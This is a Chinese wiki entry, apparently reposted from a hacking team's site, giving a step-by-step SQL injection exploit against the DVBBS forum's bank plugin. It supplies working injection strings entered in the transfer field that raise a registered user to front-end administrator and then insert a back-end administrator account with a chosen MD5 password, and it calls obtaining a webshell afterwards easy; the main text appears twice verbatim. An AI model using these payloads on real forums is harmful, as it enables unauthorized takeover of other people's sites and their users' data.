动网论坛银行插件漏洞发表评论(0)编辑词条
文章作者:kon-bluesky
信息来源:邪恶八进制信息安全团队
利用的是动网的一个银行插件漏洞.如果是SQL版本的.并且用了这个插件.成功率很高.
下面我就这个漏洞来详细的说明一个.首先我们注册一个用户.这里我己经注册好了.我就不再注册了.用户名:kon-bluesky
然后大家去社区银行
(以下代码在测试过程请仔细查看是否被回车断开)
在后面写上这条语句:test1’;update dv_user set usergroupid= 1 where userid=107112--
(userid就是你注册的用户ID,可以在用户列表里面看到) 这条语句的作用是把我们注册的用户提升为前台管理员.
成功之后.就是前台管理员了.然后再进行一次转账.跟上次一样的操作.不过语句不同了.提升为后台管理员语句:
test1’;Insert into Dv_admin(Password,Username,Adduser,Flag) values(’49ba59abbe56e057’,’kon-bluesky’,’kon-bluesky’,
’1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36’)--
(49ba59abbe56e057,MD5密码.根据自己所需进行改动.用户也是一样) 这条语句就是把kon-bluesky提升为后台管理员.
至于怎么拿到WEBSHELL.就不在这篇文章的范围之内.很简单的.本地恢复就行了.
信息来源:邪恶八进制信息安全团队
利用的是动网的一个银行插件漏洞.如果是SQL版本的.并且用了这个插件.成功率很高.
下面我就这个漏洞来详细的说明一个.首先我们注册一个用户.这里我己经注册好了.我就不再注册了.用户名:kon-bluesky
然后大家去
(以下代码在测试过程请仔细查看是否被回车断开)
在后面写上这条语句:test1’;update dv_user set usergroupid= 1 where userid=107112--
(userid就是你注册的用户ID,可以在用户列表里面看到) 这条语句的作用是把我们注册的用户提升为前台管理员.
成功之后.就是前台管理员了.然后再进行一次转账.跟上次一样的操作.不过语句不同了.提升为后台管理员语句:
test1’;Insert into Dv_admin(Password,Username,Adduser,Flag) values(’49ba59abbe56e057’,’kon-bluesky’,’kon-bluesky’,
’1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36’)--
(49ba59abbe56e057,MD5密码.根据自己所需进行改动.用户也是一样) 这条语句就是把kon-bluesky提升为后台管理员.
至于怎么拿到WEBSHELL.就不在这篇文章的范围之内.很简单的.本地恢复就行了.
→如果您认为本词条还有待完善,请 编辑词条
标签: 动网论坛银行插件漏洞 银行插件漏洞
收藏到: 
同义词: 暂无同义词
此词条来自互动百科联盟网站,详情请查阅:动网论坛银行插件漏洞
关于本词条的评论 (共0条)发表评论>>
